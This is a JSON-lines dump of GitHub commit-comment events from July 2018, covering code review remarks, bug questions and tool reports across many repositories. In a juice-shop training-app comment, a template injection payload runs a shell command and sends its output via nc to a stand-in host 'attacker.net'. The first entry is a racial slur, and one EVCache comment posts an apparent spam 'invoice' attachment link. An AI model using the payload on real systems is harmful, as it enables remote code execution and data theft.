{"id":"7999473879","type":"CommitCommentEvent","actor":{"login":"markolukicluk99"},"repo":{"name":"LukaVasiljevic/Perfect-Number"},"payload":{"comment":{"id":29790722,"position":null,"line":null,"path":null,"commit_id":"c7604f66d3429eefb719e85fc47c1c54e608c85e","created_at":"2018-07-22T01:56:25Z","updated_at":"2018-07-22T01:56:25Z","author_association":"NONE","body":"Nigga"}},"created_at":"2018-07-22T01:56:25Z"}
{"id":"7999474521","type":"CommitCommentEvent","actor":{"login":"DooblyNoobly"},"repo":{"name":"unitystation/unitystation"},"payload":{"comment":{"id":29790723,"position":4,"line":53,"path":"UnityProject/Assets/Scripts/UI/UI Bottom/ControlAction.cs","commit_id":"32cdd032516d6aaa7ea8b5b3a0100356f6d707fc","created_at":"2018-07-22T01:57:15Z","updated_at":"2018-07-22T01:57:15Z","author_association":"MEMBER","body":"My Mistake, will fix soon"}},"created_at":"2018-07-22T01:57:15Z"}
{"id":"7999475784","type":"CommitCommentEvent","actor":{"login":"Asakiz"},"repo":{"name":"Jonathas-Conceicao/PeC-Jogos-Projeto-1"},"payload":{"comment":{"id":29790726,"position":null,"line":null,"path":null,"commit_id":"fb716c35ea545e7946f5fd76b87a8d747a0074a2","created_at":"2018-07-22T01:58:48Z","updated_at":"2018-07-22T01:58:48Z","author_association":"COLLABORATOR","body":"small changes to MaxRep* "}},"created_at":"2018-07-22T01:58:48Z"}
{"id":"7999962459","type":"CommitCommentEvent","actor":{"login":"Stas1976"},"repo":{"name":"Stas1976/DrumMashine"},"payload":{"comment":{"id":29791936,"position":9,"line":40,"path":"JS/script.js","commit_id":"838427b0fdf537bac22c4e1bfddfd444f0d4eaef","created_at":"2018-07-22T10:04:29Z","updated_at":"2018-07-22T10:04:29Z","author_association":"OWNER","body":"here trying to set button transfomation\r\n"}},"created_at":"2018-07-22T10:04:29Z"}
{"id":"7999962465","type":"CommitCommentEvent","actor":{"login":"jameyboor"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29791937,"position":null,"line":null,"path":null,"commit_id":"bdbdc8030ac75f530595377a8c8fc044e36d975e","created_at":"2018-07-22T10:04:29Z","updated_at":"2018-07-22T10:04:29Z","author_association":"NONE","body":"Making mistakes is normal. I just don't get why you would add a change that you know might break things cause you were preoccupied and add it to master right away. Especially since people clone this branch."}},"created_at":"2018-07-22T10:04:29Z"}
{"id":"7999962690","type":"CommitCommentEvent","actor":{"login":"tangjinhai5233"},"repo":{"name":"tangjinhai5233/test2"},"payload":{"comment":{"id":29791938,"position":null,"line":null,"path":null,"commit_id":"4880d52d9ba1fdd40c0ad5a47091592d62f187b8","created_at":"2018-07-22T10:04:42Z","updated_at":"2018-07-22T10:04:42Z","author_association":"OWNER","body":"thanks"}},"created_at":"2018-07-22T10:04:42Z"}
{"id":"7999963013","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18008/programming-term2"},"payload":{"comment":{"id":29791939,"position":null,"line":null,"path":null,"commit_id":"b91b36e53550c24dfdfe7beab900c5dbbb4f38f4","created_at":"2018-07-22T10:05:01Z","updated_at":"2018-07-22T10:05:01Z","author_association":"NONE","body":"docstringですが、hello10-rec.pyの形式に統一するといいと思います。"}},"created_at":"2018-07-22T10:05:01Z"}
{"id":"7999965364","type":"CommitCommentEvent","actor":{"login":"skrzepij"},"repo":{"name":"therpm/cconverter"},"payload":{"comment":{"id":29791940,"position":null,"line":null,"path":null,"commit_id":"3344e037d620bed5dd2766f6745e46a1da812abc","created_at":"2018-07-22T10:07:03Z","updated_at":"2018-07-22T10:07:03Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[layout] CC-2 dodanie komponentu dla pierwszego widoku 'dashboard' i zdefiniowanie go w routingu](https://trello.com/c/jjJDeXjt/295-layout-cc-2-dodanie-komponentu-dla-pierwszego-widoku-dashboard-i-zdefiniowanie-go-w-routingu)"}},"created_at":"2018-07-22T10:07:03Z"}
{"id":"7999974235","type":"CommitCommentEvent","actor":{"login":"manucorporat"},"repo":{"name":"ionic-team/ionic"},"payload":{"comment":{"id":29791950,"position":5,"line":76,"path":"core/src/components/spinner/spinner.tsx","commit_id":"3ab1e2dc46fd82215337e47e67b78f6ccc4395f6","created_at":"2018-07-22T10:14:58Z","updated_at":"2018-07-22T10:14:58Z","author_association":"MEMBER","body":"`this.paused` is should be already a boolean, !! changes nothing, i am not sure i like kind of defensive changes, we should trust the TS type system and the fact that the stencil's runtime should ensure this prop is always a boolean.\r\n\r\nI have tested, removing `!!` and it still works fine, I don't understand how this commit is fixing the issue."}},"created_at":"2018-07-22T10:14:58Z"}
{"id":"7999974621","type":"CommitCommentEvent","actor":{"login":"talamortis"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29791956,"position":null,"line":null,"path":null,"commit_id":"bdbdc8030ac75f530595377a8c8fc044e36d975e","created_at":"2018-07-22T10:15:16Z","updated_at":"2018-07-22T10:15:16Z","author_association":"MEMBER","body":"well if you can think of another way to fix would be nice to hear from you."}},"created_at":"2018-07-22T10:15:16Z"}
{"id":"7999975546","type":"CommitCommentEvent","actor":{"login":"Yamamoto2222"},"repo":{"name":"fujita0622/ajax_task"},"payload":{"comment":{"id":29791957,"position":null,"line":null,"path":null,"commit_id":"c90b2b289f31cbfc834132b9e10b486a682d72ca","created_at":"2018-07-22T10:16:06Z","updated_at":"2018-07-22T10:16:06Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\nお疲れ様です。\r\n\r\n指摘点について、下記にまとめました。\r\n時間があるときに、ご確認をお願いします。\r\n\r\n○error_check/doc/課題仕様.txt\r\n「■概要」などが削除されている。\r\nコミットする前に自分の行った修正以外にも\r\n不要な修正が行われているかを確認し、\r\n修正が妥当でないものはコミットしないようにしてください。\r\n\r\n特に今回の場合は「仕様書」が書き換えられていますので、\r\n現場ではかなり問題になる可能性があります。\r\n\r\n○error_check/db_connect_class.php\r\n・classの名前が「connect」だと「何に接続するか」不明確です。\r\n（この場合ですと、DBに接続するので「DBconnect」が正しいかと思われます。）\r\n※本来class名はソースファイル名と同じ名前にするのが一般的です。\r\n\r\n・function「pdo」について\r\n関数名が「pdo」だと何をする関数なのかがわからないです。\r\n\r\n29行名：if (!($pdo = new PDO($dsn, $user, $pass))) {　について\r\nif 文の中でインスタンスを作るのはあまりよくないです。\r\nまた、if文で変数に代入を行い、そのまま条件分岐の条件とするのは、\r\n可読性も低くなりますので、if文の前に代入処理を行い、if文では変数の条件比較のみとした方が\r\n他の人がコードを読んだ際の可読性も上がります。\r\n\r\n○error_check/error_check.php　について\r\n・function check_int_type　が上手く動作していないと思われます。\r\n・49行目のエラーチェック対象項目が「身長」かどうか、の「身長」がハードコーディングされています。\r\n　あまり、文言に対してハードコーディングするのはよくありません。\r\n　というのも、文言はいきなり変わることがよくあるので、文言変更時にこのif文の条件の変更を忘れることがよくあるためです。\r\n・49行目　「empty($var) == false」について、「0」を入力すると「true」になるので、エラーチェックから除外されます。注意してください。\r\n\r\n\r\n○良かった点\r\n・DBのプレースホルダーを使用して更新処理が行われていた。\r\n・入力項目の「メモ」の改行を認識するように実装されていた。\r\n・定数化ファイルをひとつにまとめた点。\r\n\r\n○改善点\r\n・誕生日「セレクトボックス」の更新ができていない\r\n（値が画面に反映されない）\r\n・身長は「60以上、250以下」の場合はエラーとする、の仕様が実装されていない。\r\n　input type=number でその範囲外は入力できないようになっていますが、\r\n　他のエラーチェックの仕方とやり方が異なるので、統一感がでていない実装となっています。\r\n・体重などの「体重は数値で入力してください」のエラーチェックが実装されていない。\r\n　Chromeでは数値しか入力できないが、IEでは数値以外も入力できる。\r\n　（ソース自体はあるが、画面の動作が上手くいっていない）\r\n　数値以外のものを入力して登録をした場合には登録が失敗しているが、「登録完了しました」が表示されている。\r\n・入力項目「健康の気になる症状」などに「\"\"」を入力して、登録を行うと値が空になる。\r\n・外部関数化を行っているが、class化はされていない関数はどこで定義されているものなのか分かりにくい"}},"created_at":"2018-07-22T10:16:06Z"}
{"id":"7999980810","type":"CommitCommentEvent","actor":{"login":"BbakeWalker"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29791965,"position":82,"line":96,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"78e07dce2ab5ed3a7df2b254b853a7cc7ad0b0e8","created_at":"2018-07-22T10:20:23Z","updated_at":"2018-07-22T10:20:23Z","author_association":"NONE","body":"**error: incompatible types: EarthquakeLoader cannot be converted to Loader<List<Earthquake>>**\r\n\r\nI have this error if anyone knows how to fix help me out.\r\n"}},"created_at":"2018-07-22T10:20:23Z"}
{"id":"7999981082","type":"CommitCommentEvent","actor":{"login":"ganesh101992"},"repo":{"name":"ganesh101992/Ball-and-SoccerRegion-detection"},"payload":{"comment":{"id":29791968,"position":null,"line":null,"path":null,"commit_id":"bec072da70b1b70f2a4736bf182e3a90fc2e0efc","created_at":"2018-07-22T10:20:37Z","updated_at":"2018-07-22T10:20:37Z","author_association":"OWNER","body":"Version 1.0"}},"created_at":"2018-07-22T10:20:37Z"}
{"id":"7999990530","type":"CommitCommentEvent","actor":{"login":"MrCrayfish"},"repo":{"name":"MrCrayfish/MrCrayfishFurnitureMod"},"payload":{"comment":{"id":29791984,"position":35,"line":47,"path":"src/main/java/com/mrcrayfish/furniture/blocks/BlockDesk.java","commit_id":"378f8d83028549c6bed8ef83a6629fabe9e64a38","created_at":"2018-07-22T10:29:22Z","updated_at":"2018-07-22T10:29:22Z","author_association":"OWNER","body":"It is, that's what I am using I18n"}},"created_at":"2018-07-22T10:29:22Z"}
{"id":"7999990925","type":"CommitCommentEvent","actor":{"login":"develop7"},"repo":{"name":"rikvdkleij/intellij-haskell"},"payload":{"comment":{"id":29791985,"position":7,"line":20,"path":"README.md","commit_id":"ce5ae16f6ee2ec13871b61ff3f75f5b22413d44d","created_at":"2018-07-22T10:29:45Z","updated_at":"2018-07-22T10:29:45Z","author_association":"NONE","body":"Should be `https://plugins.jetbrains.com/plugins/alpha/8258`\t"}},"created_at":"2018-07-22T10:29:45Z"}
{"id":"7999991856","type":"CommitCommentEvent","actor":{"login":"Corediva666"},"repo":{"name":"Netflix/EVCache"},"payload":{"comment":{"id":29791989,"position":38,"line":834,"path":"evcache-client/src/main/java/com/netflix/evcache/pool/EVCacheClientPool.java","commit_id":"083ef9fd90bb84b78c273a3f50d30c3665c81ae0","created_at":"2018-07-22T10:30:33Z","updated_at":"2018-07-22T10:30:33Z","author_association":"NONE","body":" I/SDKAccountManager 26981:27611 SourceFile:122] use memcache account\r\n[2018-07-13 04:52:55.282 E/KeyStoreEncryptAndDecrypt 26981:27611 SourceFile:142] Decrypt source data is invalid.\r\n[2018-07-13 04:52:55.283 D/TerminalInfo 26981:27611 SourceFile:112] getUUid :******************-82a2-c8e310d663a8\r\n[2018-07-13 04:52:55.284 I/BaseUtil 26981:27611 SourceFile:122] getAndroidSystemUserId =0\r\n[2018-07-13 04:52:55.284 D/TerminalInfo 26981:27611 SourceFile:112] UnitedId= ******************-82a2-c8e310d663a8\r\n[2018-07-13 04:52:55.286 D/TerminalInfo 26981:27611 SourceFile:112] TerminalType is: DLI-L22\r\n[2018-07-13 04:52:55.287 I/BaseUtil 26981:27611 SourceFile:122] enter networkIsAvaiable\r\n[2018-07-13 04:52:55.290 I/BaseUtil 26981:27611 SourceFile:122] NetworkInfo  state 0DISCONNECTED\r\n[2018-07-13 04:52:55.291 I/BaseUtil 26981:27611 SourceFile:122] NetworkInfo  state "}},"created_at":"2018-07-22T10:30:33Z"}
{"id":"7999994412","type":"CommitCommentEvent","actor":{"login":"rikvdkleij"},"repo":{"name":"rikvdkleij/intellij-haskell"},"payload":{"comment":{"id":29791992,"position":7,"line":20,"path":"README.md","commit_id":"ce5ae16f6ee2ec13871b61ff3f75f5b22413d44d","created_at":"2018-07-22T10:32:56Z","updated_at":"2018-07-22T10:32:56Z","author_association":"OWNER","body":"Oops, thanks for your alertness!"}},"created_at":"2018-07-22T10:32:56Z"}
{"id":"7999994543","type":"CommitCommentEvent","actor":{"login":"Corediva666"},"repo":{"name":"Netflix/EVCache"},"payload":{"comment":{"id":29791993,"position":38,"line":834,"path":"evcache-client/src/main/java/com/netflix/evcache/pool/EVCacheClientPool.java","commit_id":"083ef9fd90bb84b78c273a3f50d30c3665c81ae0","created_at":"2018-07-22T10:33:04Z","updated_at":"2018-07-22T10:33:04Z","author_association":"NONE","body":"[invoice\r\nDHB\r\n(https://github.com/Netflix/EVCache/files/2216902/invoice_1160659.pdf)\r\n"}},"created_at":"2018-07-22T10:33:04Z"}
{"id":"7999996672","type":"CommitCommentEvent","actor":{"login":"donho"},"repo":{"name":"notepad-plus-plus/notepad-plus-plus"},"payload":{"comment":{"id":29791995,"position":null,"line":null,"path":null,"commit_id":"fc7ef50fb619984c14f25220f9748edfc81e0a06","created_at":"2018-07-22T10:34:56Z","updated_at":"2018-07-22T10:34:56Z","author_association":"MEMBER","body":"I cannot reproduce the crash on my notepad++ 32 bits.\r\nAnd how can it prevent from crashing by adding this line?"}},"created_at":"2018-07-22T10:34:56Z"}
{"id":"8000000396","type":"CommitCommentEvent","actor":{"login":"rikvdkleij"},"repo":{"name":"rikvdkleij/intellij-haskell"},"payload":{"comment":{"id":29792004,"position":7,"line":20,"path":"README.md","commit_id":"ce5ae16f6ee2ec13871b61ff3f75f5b22413d44d","created_at":"2018-07-22T10:38:23Z","updated_at":"2018-07-22T10:38:23Z","author_association":"OWNER","body":"It's fixed."}},"created_at":"2018-07-22T10:38:23Z"}
{"id":"8000000552","type":"CommitCommentEvent","actor":{"login":"andiandi13"},"repo":{"name":"vanilla-music/vanilla"},"payload":{"comment":{"id":29792005,"position":null,"line":null,"path":null,"commit_id":"317641bc3027177e2a4f747f8277aa933d458565","created_at":"2018-07-22T10:38:31Z","updated_at":"2018-07-22T10:38:31Z","author_association":"NONE","body":"@adrian-bl I've updated the transifex French strings (since a long time now). If you can add them to vanilla please."}},"created_at":"2018-07-22T10:38:31Z"}
{"id":"8000003008","type":"CommitCommentEvent","actor":{"login":"SamuelGarratt"},"repo":{"name":"BFNZ/bfnz"},"payload":{"comment":{"id":29792008,"position":null,"line":null,"path":null,"commit_id":"6442767d8a8a2252da65ab37c9ce0acd16086ae1","created_at":"2018-07-22T10:40:42Z","updated_at":"2018-07-22T10:40:42Z","author_association":"COLLABORATOR","body":"Working now"}},"created_at":"2018-07-22T10:40:42Z"}
{"id":"8000003648","type":"CommitCommentEvent","actor":{"login":"selfish"},"repo":{"name":"sawyersteven/SelfishClass"},"payload":{"comment":{"id":29792012,"position":12,"line":12,"path":"tests.py","commit_id":"f1593ed679799c93ea9f89fc4b4c976d4c6b85d4","created_at":"2018-07-22T10:41:16Z","updated_at":"2018-07-22T10:41:16Z","author_association":"NONE","body":"ROFL, hi there. Apparently you including `@selfish` just tagged me.\r\nI approve this PR! ;)"}},"created_at":"2018-07-22T10:41:16Z"}
{"id":"8000007126","type":"CommitCommentEvent","actor":{"login":"fbrosson"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29792029,"position":60,"line":60,"path":"app-text/libexttextcat/libexttextcat-3.4.5.recipe","commit_id":"7a829f54e405936ffba2f1b7efa1987fe71668e8","created_at":"2018-07-22T10:44:25Z","updated_at":"2018-07-22T10:44:25Z","author_association":"MEMBER","body":"I'm OK with both `prepareInstalledDevelLib` and `prepareInstalledDevelLibs`, although I prefer `prepareInstalledDevelLib` for recipes which only have one lib.\r\n\r\nI don't think, however, that prepareInstalledDevelLib**s** should be used everywhere.\r\n\r\nSo, let's make a deal:\r\n1) each contributor can use any variant.\r\n2) each reviewer can suggest `prepareInstalledDevelLib` (when there is only one lib) to most contributors.\r\n3) major contributors may not be bothered with these questions :)"}},"created_at":"2018-07-22T10:44:25Z"}
{"id":"8000012547","type":"CommitCommentEvent","actor":{"login":"winlinvip"},"repo":{"name":"ossrs/srs"},"payload":{"comment":{"id":29792037,"position":null,"line":null,"path":null,"commit_id":"41c6e833b99829be4929f5bc90f83a237ccf7c33","created_at":"2018-07-22T10:49:14Z","updated_at":"2018-07-22T10:49:14Z","author_association":"MEMBER","body":"https://github.com/ossrs/srs/issues/917#issuecomment-406856975"}},"created_at":"2018-07-22T10:49:14Z"}
{"id":"8000013394","type":"CommitCommentEvent","actor":{"login":"primo-1"},"repo":{"name":"primo-1/Beginner-s-Lessons-in-HTML5"},"payload":{"comment":{"id":29792040,"position":null,"line":null,"path":null,"commit_id":"a009d7fad4abd9d58254ed4ef09b951d90e9fec1","created_at":"2018-07-22T10:49:58Z","updated_at":"2018-07-22T10:49:58Z","author_association":"OWNER","body":"<!DOCTYPE html>\r\n<body>\r\n\t<form method=\"GET\">\r\n\t\tFirst Name: <input type=<\"text\" name=\"firstname\"><br>\r\n\t\tLast Name: <input type=<\"text\" name=\"lastname\"><br>\r\n\t\tEmail: <input type=<\"email\" name=\"email\"><br>\r\n\t\tPassword: <input type=<\"password\" name=\"password minlength=8\"><br>\r\n\t\tBirthday: <input type=<\"date\" name=\"birthday\"><br>\r\n\t\t\r\n\t\tGender:<br>\r\n\t\t<input type=\"radio\" name=\"gender\" value=\"Male\">Male<br>\r\n\t\t<input type=\"radio\" name=\"gender\" value=\"Female\">Female<br>\r\n\t\t<input type=\"radio\" name=\"gender\" value=\"Other\">Other<br>\r\n\t\t\r\n\t\tPets: <br>\r\n\t\t<input type=\"checkbox\" name=\"cat\"> Cat<br>\r\n\t\t<input type=\"checkbox\" name=\"dog\"> Dog<br>\r\n\t\t\r\n\t\tCars:<br>\r\n\t\t<select name=cars>\r\n\t\t\t<option value=\"volvo\" >Volvo</option>\r\n\t\t\t<option value=\"Audi\" >Audi</option>\r\n\t\t</select><br>\r\n\t\t\r\n\t\t<input type=\"submit\" value=\"Register\"!\">\r\n\t\t<input type=\"reset\">\r\n\t</form>\r\n</body>\r\n</html>"}},"created_at":"2018-07-22T10:49:58Z"}
{"id":"8000019559","type":"CommitCommentEvent","actor":{"login":"gubbas"},"repo":{"name":"Greensona/greensona"},"payload":{"comment":{"id":29792049,"position":null,"line":null,"path":null,"commit_id":"2d7194ba41de92b757b353439e88a1c1fb3dc11a","created_at":"2018-07-22T10:55:30Z","updated_at":"2018-07-22T10:55:30Z","author_association":"CONTRIBUTOR","body":"ready to checkin"}},"created_at":"2018-07-22T10:55:30Z"}
{"id":"8000019768","type":"CommitCommentEvent","actor":{"login":"ApfelTV"},"repo":{"name":"iDroid27/homer"},"payload":{"comment":{"id":29792050,"position":null,"line":null,"path":null,"commit_id":"0b5bb45a8a41a3de7a56d34c65a076156f2bed6b","created_at":"2018-07-22T10:55:42Z","updated_at":"2018-07-22T10:55:42Z","author_association":"CONTRIBUTOR","body":"more logging eh?"}},"created_at":"2018-07-22T10:55:42Z"}
{"id":"8000027365","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29792061,"position":null,"line":null,"path":null,"commit_id":"634f2fa963e449daf492ef83a4289df4b183c91b","created_at":"2018-07-22T11:02:03Z","updated_at":"2018-07-22T11:02:03Z","author_association":"COLLABORATOR","body":"Puzzle `1395-2f0f55eb` discovered in   [`src/test/resources/com/zerocracy/bundles/close_job_with_quality_review/_after.groovy`](  https://github.com/zerocracy/farm/blob/master/src/test/resources/com/zerocracy/bundles/close_job_with_quality_review/_after.groovy)   and submitted as #1460. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-22T11:02:03Z"}
{"id":"8000030735","type":"CommitCommentEvent","actor":{"login":"lanmingle"},"repo":{"name":"clelo-org/lazy-balancer"},"payload":{"comment":{"id":29792065,"position":null,"line":null,"path":null,"commit_id":"90036afa6796335c18bd7126380eb34a818f17f2","created_at":"2018-07-22T11:04:57Z","updated_at":"2018-07-22T11:04:57Z","author_association":"NONE","body":"查看：https://github.com/v55448330/lazy-balancer/issues/1\r\n"}},"created_at":"2018-07-22T11:04:57Z"}
{"id":"8000037769","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"Qiangong2/android_device_samsung_jf-common"},"payload":{"comment":{"id":29792075,"position":null,"line":null,"path":null,"commit_id":"b43f74832074e67a9ab25557b8ee18b0aaebef16","created_at":"2018-07-22T11:10:56Z","updated_at":"2018-07-22T11:10:56Z","author_association":"NONE","body":"did you guys managed to boot ubuntu touch on jflte device? "}},"created_at":"2018-07-22T11:10:56Z"}
{"id":"8000038842","type":"CommitCommentEvent","actor":{"login":"CaptainFreak"},"repo":{"name":"CaptainFreak/juice-shop"},"payload":{"comment":{"id":29792077,"position":18,"line":13,"path":"routes/userProfile.js","commit_id":"baf6e6eb2a245e46fecec1525969a15d3ddb8b42","created_at":"2018-07-22T11:11:55Z","updated_at":"2018-07-22T11:11:55Z","author_association":"OWNER","body":"`user.dataValues.username` will have the payload .. but we need newline character to have legit harmfull payload .. like\r\ninstead of just normal `#{4*7}` we should have payload like \r\n``` - var x = root.process\r\n- x = x.mainModule.require\r\n- x = x('child_process')\r\n= x.exec('id | nc attacker.net 80') ``` \r\n\r\nBut this payload will need to contain tabs and newlines .. how to send such payload from frontend ?"}},"created_at":"2018-07-22T11:11:55Z"}
{"id":"8000041115","type":"CommitCommentEvent","actor":{"login":"GreatBahram"},"repo":{"name":"GreatBahram/Flask-LoginTemplate"},"payload":{"comment":{"id":29792081,"position":13,"line":13,"path":"app/__init__.py","commit_id":"711d369e405e89b7d708f0966c4c0c23ad984b93","created_at":"2018-07-22T11:13:48Z","updated_at":"2018-07-22T11:13:48Z","author_association":"OWNER","body":"What a dramatic change dude\r\n"}},"created_at":"2018-07-22T11:13:48Z"}
{"id":"8000041756","type":"CommitCommentEvent","actor":{"login":"feudjio-mano"},"repo":{"name":"feudjio-mano/datasciencecoursera"},"payload":{"comment":{"id":29792084,"position":null,"line":null,"path":null,"commit_id":"7ee061ca2ba7018e4d9a93b2276a8c20c800ef65","created_at":"2018-07-22T11:14:23Z","updated_at":"2018-07-22T11:14:23Z","author_association":"OWNER","body":"This is a markdown file"}},"created_at":"2018-07-22T11:14:23Z"}
{"id":"8000047081","type":"CommitCommentEvent","actor":{"login":"RamakrishnaValluri"},"repo":{"name":"RamakrishnaValluri/git-T2"},"payload":{"comment":{"id":29792090,"position":null,"line":null,"path":null,"commit_id":"b97b67c8a57a59934a1f93c766bf1474340b509e","created_at":"2018-07-22T11:18:51Z","updated_at":"2018-07-22T11:18:51Z","author_association":"OWNER","body":"Merge from GitHub"}},"created_at":"2018-07-22T11:18:51Z"}
{"id":"8000047264","type":"CommitCommentEvent","actor":{"login":"rogeriomartinez"},"repo":{"name":"binarymax/heimdall"},"payload":{"comment":{"id":29792091,"position":null,"line":null,"path":null,"commit_id":"581179addb1ff04f2fda3ceb17aa7fbd0004bdf3","created_at":"2018-07-22T11:19:02Z","updated_at":"2018-07-22T11:19:02Z","author_association":"NONE","body":"https://github.com/binarymax/heimdall/commit/581179addb1ff04f2fda3ceb17aa7fbd0004bdf3?diff=unified#diff-b9cfc7f2cdf78a7f4b91a753d10865a2"}},"created_at":"2018-07-22T11:19:02Z"}
{"id":"8000059606","type":"CommitCommentEvent","actor":{"login":"fupenghui11"},"repo":{"name":"fupenghui11/xx.yml"},"payload":{"comment":{"id":29792142,"position":null,"line":null,"path":null,"commit_id":"9e68b48182b60050f0f0d12dc6fc68b12aad56c0","created_at":"2018-07-22T11:29:33Z","updated_at":"2018-07-22T11:29:33Z","author_association":"OWNER","body":"aa"}},"created_at":"2018-07-22T11:29:33Z"}
{"id":"8000059975","type":"CommitCommentEvent","actor":{"login":"fupenghui11"},"repo":{"name":"fupenghui11/xx.yml"},"payload":{"comment":{"id":29792143,"position":null,"line":null,"path":null,"commit_id":"9e68b48182b60050f0f0d12dc6fc68b12aad56c0","created_at":"2018-07-22T11:29:52Z","updated_at":"2018-07-22T11:29:52Z","author_association":"OWNER","body":"xx"}},"created_at":"2018-07-22T11:29:52Z"}
{"id":"8000065475","type":"CommitCommentEvent","actor":{"login":"AndreyGTHB"},"repo":{"name":"AndreyGTHB/Hunting_for_foxes"},"payload":{"comment":{"id":29792150,"position":null,"line":null,"path":null,"commit_id":"4149e520776ebffc75e3c5f1e9fc704151266794","created_at":"2018-07-22T11:32:18Z","updated_at":"2018-07-22T11:32:18Z","author_association":"OWNER","body":"\r\nThere is a hidden error in the commit 'error not found'. I'll look for her."}},"created_at":"2018-07-22T11:32:18Z"}
{"id":"8000069320","type":"CommitCommentEvent","actor":{"login":"Sinerei"},"repo":{"name":"Sinerei/IRL"},"payload":{"comment":{"id":29792154,"position":null,"line":null,"path":null,"commit_id":"7c120bcc30bdaa4bd85cd20b41efd2f207a8856b","created_at":"2018-07-22T11:33:58Z","updated_at":"2018-07-22T11:33:58Z","author_association":"OWNER","body":"hi\r\n"}},"created_at":"2018-07-22T11:33:58Z"}
{"id":"8000076086","type":"CommitCommentEvent","actor":{"login":"illfated"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29792156,"position":null,"line":null,"path":null,"commit_id":"c0148c40bfaa2926adf814885419565c16d02490","created_at":"2018-07-22T11:36:52Z","updated_at":"2018-07-22T11:36:52Z","author_association":"NONE","body":"Cool. I did not imagine that the Gaffer Jack quest issue could have such a simple or narrow solution."}},"created_at":"2018-07-22T11:36:52Z"}
{"id":"8000076979","type":"CommitCommentEvent","actor":{"login":"testxquef"},"repo":{"name":"testxquef/GIT_TEST"},"payload":{"comment":{"id":29792157,"position":null,"line":null,"path":null,"commit_id":"9ca837e6a52dc58218f16d25a1d4e3ba153761da","created_at":"2018-07-22T11:37:14Z","updated_at":"2018-07-22T11:37:14Z","author_association":"OWNER","body":"its okay"}},"created_at":"2018-07-22T11:37:14Z"}
{"id":"8000079303","type":"CommitCommentEvent","actor":{"login":"ApfelTV"},"repo":{"name":"RiiConnect24/Site"},"payload":{"comment":{"id":29792160,"position":null,"line":null,"path":null,"commit_id":"2fd3bee9bf80baac798ed2ce528e4b3d2d7d1347","created_at":"2018-07-22T11:38:15Z","updated_at":"2018-07-22T11:38:15Z","author_association":"NONE","body":"oof sed"}},"created_at":"2018-07-22T11:38:15Z"}
{"id":"8000084925","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792164,"position":null,"line":null,"path":null,"commit_id":"b084d3e6e33f1dc3f6765e08ce467c07bf8496b9","created_at":"2018-07-22T11:43:01Z","updated_at":"2018-07-22T11:43:01Z","author_association":"OWNER","body":"## Detekt report:\n❌LongParameterList - 9/7 - [myFunc]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L18\n\nEmptyIfBlock - [myFunc]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L20\n\nEmptyIfBlock - [myFunc]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L22\n\nEmptyIfBlock - [myFunc]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L26\n\nEmptyElseBlock - [myFunc]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L28\n\nEmptyWhenBlock - [myFunc]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L33\n\nEmptyIfBlock - [createPresenter]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/Factory.kt#L9\n\nEmptyIfBlock - [createPresenter]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/Factory.kt#L11\n\nMagicNumber - [num]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L16\n\nMagicNumber - [myFunc]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L22\n\nMagicNumber - [myFunc]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L26\n\nMagicNumber - [myFunc]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L38\n\nMagicNumber - [createPresenter]\nhttps://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/Factory.kt#L11\n\n"}},"created_at":"2018-07-22T11:43:01Z"}
{"id":"8000090420","type":"CommitCommentEvent","actor":{"login":"jochem33"},"repo":{"name":"jochem33/zimbabsurviv"},"payload":{"comment":{"id":29792170,"position":null,"line":null,"path":null,"commit_id":"a2ee015806a55aea76ded2bd4289f64b8b3875c2","created_at":"2018-07-22T11:47:22Z","updated_at":"2018-07-22T11:47:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Tiles maken voor start area](https://trello.com/c/iufQ6uve/4-tiles-maken-voor-start-area)"}},"created_at":"2018-07-22T11:47:22Z"}
